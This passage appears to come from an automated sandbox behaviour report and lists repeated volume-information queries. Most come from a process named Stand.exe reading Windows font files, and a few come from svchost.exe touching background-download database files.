          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\flat_officeFontsPreview.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\OFFSYM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\OFFSYMSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
